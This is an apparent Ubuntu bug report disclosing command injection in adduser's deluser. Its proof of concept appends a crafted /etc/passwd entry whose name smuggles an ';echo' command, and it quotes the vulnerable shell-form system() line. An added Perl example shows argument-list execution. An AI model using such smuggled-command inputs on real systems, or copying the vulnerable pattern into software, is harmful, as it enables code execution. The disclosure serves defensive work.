command injection in deluser

Bug #782170 reported by Emanuel Bronshtein
This bug affects 1 person
Affects           Status  Importance  Assigned to  Milestone
adduser (Ubuntu)  New     Undecided   Unassigned

Bug Description

Binary package hint: adduser

/usr/sbin/deluser has a command injection bug.

Test case:
root@emanuel-desktop:/tmp# echo ";echo SystemInj;1:x:9898:9899:,,,:/home/Sysinj:/bin/bash" >> /etc/passwd
root@emanuel-desktop:/tmp# /usr/sbin/deluser ";echo SystemInj;1"
no crontab for root
SystemInj
Removing user `;echo SystemInj;1' ...
Warning: group `' has no more members.
Done.

The bug can be found at:
    if (system("crontab -l $user >/dev/null 2>&1") == 0) {
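
The quoted line uses the single-string form of Perl's system(), which hands the interpolated command to /bin/sh. The following is an added example, not part of the original report and not adduser's code: it runs the same check with an explicit argument list and no shell. The helper names (valid_username, run_quiet, user_has_crontab) and the login-name pattern are assumptions made for this example.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumption: a conservative login-name pattern chosen for this example.
sub valid_username {
    my ($user) = @_;
    return (defined $user && $user =~ /\A[a-z_][a-z0-9_-]{0,31}\z/) ? 1 : 0;
}

# Run a command from an explicit argv with output discarded. No /bin/sh is
# involved, so ";", "|" or "$(...)" inside an argument are plain bytes.
# Returns the raw wait status ($?).
sub run_quiet {
    my @argv = @_;
    my $pid = fork();
    die "fork failed: $!\n" unless defined $pid;
    if ($pid == 0) {
        open(STDOUT, '>', '/dev/null') or exit 127;
        open(STDERR, '>', '/dev/null') or exit 127;
        exec { $argv[0] } @argv;    # indirect-object form never uses a shell
        exit 127;                   # reached only if exec itself failed
    }
    waitpid($pid, 0);
    return $?;
}

# Same check and same arguments as the line quoted in the report, but the
# name is validated first and then passed as a single argv element.
sub user_has_crontab {
    my ($user) = @_;
    return 0 unless valid_username($user);
    return run_quiet('crontab', '-l', $user) == 0 ? 1 : 0;
}

# Constructed input: the user name from the report's test case.
my $name = ';echo SystemInj;1';
print "valid_username: ", valid_username($name), "\n";
print "user_has_crontab: ", user_has_crontab($name), "\n";

# The child perl exits with its argument count, which shows whether the
# string arrived as one argv element or was split at ";" by a shell.
my $argc = run_quiet($^X, '-e', 'exit scalar(@ARGV)', $name) >> 8;
print "argv elements seen by child: $argc\n";
```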
